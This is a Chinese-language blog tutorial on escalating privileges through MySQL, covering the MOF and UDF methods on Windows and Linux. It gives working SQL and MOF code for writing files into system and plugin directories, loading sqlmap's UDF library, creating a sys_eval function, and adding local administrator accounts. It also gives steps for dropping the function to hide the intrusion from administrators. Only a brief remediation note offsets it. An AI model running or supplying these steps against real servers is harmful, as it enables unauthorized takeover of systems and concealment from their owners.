MySQL数据库提权的几种方式

avatar
作者
筋斗云
阅读量:15

MySQL提权的三种方法参考文献

提权总结以及各种利用姿势

windows+MYSQL+UDF提权

MySQL提权的必要条件:

具有MySQL的root权限,且MySQL以system权限运行。

具有执行SQL语句的权限。

获取root密码的方法:

查看数据库配置文件

关键字:config、conn、sql、data、inc、database等

下载mysql安装路径下的数据文件

暴力破解

MySQL数据库提权的几种方式MOF提权

原理

利用了C:\Windows\System32\wbem\MOF目录下的nullevt.mof文件

利用该文件每分钟会去执行一次的特性,向该文件中写入cmd命令,就会被执行

利用条件

只使用于windows系统,一般低版本系统才可以用,比如xp、server2003

对C:\Windows\System32\wbem\MOF目录有读写权限

可以找到一个可写目录,写入mof文件

提权方法

在可写目录中上传mof文件。

把mof文件上传到C:/wmpub/nullevt.mof

把这个文件复制到C:/Windows/System32/wbem/MOF/nullevt.mof目录下

select load_file('C:/wmpub/nullevt.mof') into dumpfile 'C:/Windows/System32/wbem/MOF/nullevt.mof'

将下面这段代码复制到mof后缀的文件中


# pragma namespace("\.\root\subscription")

instance of EventFilter as $EventFilter{ EventNamespace ="Root\Cimv2"; Name = "filtP2"; Query = "Select * From InstanceModificationEvent "

"Where TargetInstance Isa \"Win32_LocalTime\" "

"And TargetInstance.Second = 5";

QueryLanguage = "WQL";

};

instance of ActiveScriptEventConsumer as $Consumer

{

Name = "consPCSV2";

ScriptingEngine = "JScript";

ScriptText =

"var WSH = new

ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add")";

};

instance of __FilterToConsumerBinding

{

Consumer = $Consumer;

Filter = $EventFilter;

};

把这个mof文件上传到目标机中,可以修改代码,进行命令执行。

目前mof提权方法用的比较少,建议使用udf脚本进行MySQL数据库提权。

补救措施

当发现服务器被使用mof提权,解决继续执行系统命令的方法:

先停止winmgmt服务:net stop winmgmt

删除文件夹:C:\Windows\System32\wbem\Repository

再重新启动winmgmt服务:net start winmgmt

UDF提权(用户自定义函数提权)

原理

UDF(User Defined Funtion)用户自定义函数,通过添加新的函数,对mysql服务器进行功能扩充。

信息收集

select version();   # 获取数据库版本
select user();  # 获取数据库用户
select @@basedir;   # 获取数据库安装目录
show variables like ‘%plugin%’; # 查看plugin路径。

Windows UDF提权

UDF可以理解为MySQL的函数库,可以利用udf定义的创建函数。想要利用udf,必须上传udf.dll作为udf的执行库。MySQL中支持UDF扩展,使得我们可以调用DLL里面的函数来实现一些特殊的功能。

利用条件

如果mysql版本大于5.1,udf.dll文件必须放置在mysql安装目录的MySQL\Lib\Plugin\文件夹下,该目录默认是不存在的,需要使用webshell找到mysql的安装目录,并在安装目录下创建MySQL\Lib\Plugin\文件夹,然后将udf.dll导入到该目录。

如果mysql版本小于5.1,udf.dll文件在windows server 2003下放置于c:/windows/system32/目录,在windows server 2000下放置在c:/winnt/system32/目录。

掌握mysql数据库的root账户,从而拥有对mysql的insert和delete权限,以创建和抛弃函数。

拥有可以将udf.dll写入相应目录的权限。

基本步骤

DLL文件的获取方法

在sqlmap/data/udf/mysql目录下,在Windows目录中有32位和64位的dll文件(MySQL位数)。

文件夹中的dll文件是通过异或编码的,可以使用sqlmap/extract/cloak.py进行解码

python /sqlmap/extra/cloak/cloak.py -d -i /sqlmap/udf/mysql/windows/64/lib_mysqludf_sys.dll_

将解码后的DLL文件(包含用户自定义函数的DLL文件)上传到可写目录,再导入到MySQL\lib\plugin\中

select LOAD_FILE('C:/可写目录/lib_mysqludf_sys.dll') into dumpfile 'C:/phpStudy2016/MySQL/lib/plugin/lib_mysqludf_sys.dll';

将DLL中的函数引入到MySQL数据库中

创建自定义函数

create function sys_eval returns string soname 'lib_mysqludf_sys.dll';

创建名为sys_eval的函数,返回值为string类型,调用的文件是lib_mysqludf_sys.dll

注意:需要创建.dll文件中存在的函数,可以使用十六进制编辑器打开.dll文件,查看可以被创建的函数。

使用该函数去执行系统命令提权

查看当前用户权限

select sys_eval("whoami");

创建账号并提升为管理员权限

select sys_eval("net user winhex passw@ord /add");

select sys_eval("net localgroup administrators winhex /add");

将之前引入的函数删除掉

防止被管理员发现,防止其他攻击者使用

drop function sys_eval;

delete from mysql.func where;

Linux UDF提权

简述

通过自定义库函数来实现执行任意的命令

包含用户自定义函数的文件为.so文件

要求

提权过程

查找插件库的路径

show variables like '%plugin%';

得到的结果为:

Variable_nameValue

plugin_dir

/usr/lib64/mysql/plugin

找到对应操作系统数据库的UDF库文件

sqlmap-master\data\udf\mysql\linux\64下的lib_mysqludf_sys.so_文件

将so文件(UDF库文件)进行16进制编码

将so文件的内容解码,写入到mysql插件库目录中

select unhex('so文件的16进制编码') into dumpfile '/usr/lib64/mysql/plugin/xxx.so'

查看udf库所支持的函数

注意:需要创建.so文件中存在的函数,可以使用十六进制编辑器打开.so文件,查看可以被创建的函数。

创建函数

写入之后,执行创建函数的命令,就会创建一个sys_eval的函数,用来执行系统命令,这个函数执行的系统命令全部都是system权限。

create function sys_eval returns string soname 'xxx.so';

执行系统命令,提权

sys_eval这个函数就可以执行系统命令,括号里输入系统命令即可。

查看当前用户权限

select sys_eval("whoami");

创建账号并提升为管理员权限

不需要判断mysql的版本,直接查看路径,直接写so文件,Linux里面的文件是so文件。

getshell之后,在终端输入whoami,发现只是apache用户权限。

寻找网站的数据库配置文件,查看数据库的账号密码,可以看到账号root密码root。

登录mysql数据库,输入show variables like '%plugin%';查看plugin路径。

得到的结果为:

Variable_nameValue

plugin_dir

/usr/lib64/mysql/plugin

我们把so文件进行16进制编码,再解码写入目录中,返回为true,写入成功。

select unhex('so文件的16进制编码') into dumpfile '/usr/lib64/mysql/plugin/xxx.so'

写入之后,执行创建函数的命令,就会创建一个sys_eval的函数,用来执行系统命令,这个函数执行的系统命令全部都是system权限。

create function sys_eval returns string soname 'xxx.so';

sys_eval这个函数就可以执行系统命令,括号里输入系统命令即可。

select sys_eval('whoami')

开机启动项提权

利用MySQL,将后门写入开机启动项。同时因为是开机自启动,在写入之后,需要重启目标服务器,才可以运行。

广告一刻

为您即时展示最新活动产品广告消息,让您随时掌握产品活动新动态!